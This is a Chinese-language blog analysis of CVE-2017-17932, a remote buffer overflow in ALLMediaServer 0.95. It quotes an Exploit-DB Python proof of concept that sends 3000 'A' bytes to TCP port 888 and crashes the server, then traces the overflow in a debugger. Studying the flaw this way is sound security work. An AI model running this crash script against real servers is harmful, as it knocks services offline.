[CVE-2017-17932] ALLMediaServer 0.95 远程溢出漏洞分析
0x00 参考
https://www.exploit-db.com/exploits/43406/
# Exploit Title: Buffer overflow in ALLPlayer ALLMediaServer 0.95 and earlier
https://www.exploit-db.com/exploits/43406/
# Exploit Title: Buffer overflow in ALLPlayer ALLMediaServer 0.95 and earlier
# CVE: CVE-2017-17932
# Date: 27-12-2017
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://www.allmediaserver.org/
# Category: webapps
# Attack Type: Remote
# Impact: Code execution and/or Denial of Service
#1. Description
#
#A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string.
#
#
#2. Proof of Concept
#
#!/usr/bin/python
#NOTE: I found this bug via patch-diffing and I had IDA Pro set up as my Just-In-Time debugger at the time of the crash but any debugger should work.
def
main():
s
=
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((
'192.168.205.131'
,
888
))
buffer
=
"A"
*
3000
s.send(
buffer
)
s.close()
if
__name__
=
=
'__main__'
:
import
socket
main()
将192.168.205.131改为自己的ip
0x01 漏洞分析
复现环境(windows10,python2.7.0)
启动ALLMediaServer,用调试器附加MediaServer.exe,用poc向127.0.0.1:888发送TCP请求,触发漏洞(MediaServer.exe崩溃)
可以看出当前栈被0x41覆盖了
根据崩溃的那个点buf = 0534F910(这个值会变化的)找到触发漏洞地方
发送第一次请求
buf里的内容,并没有溢出,只是服务端初始化了一些数据
先对这个地址下硬件断点,再发第2次请求,这是会断到某个位置(accept函数里)
一直单步,来到接收数据那块地方
步入
可以看到接收到的数据,全部读取到buf里,造成了溢出
评论
发表评论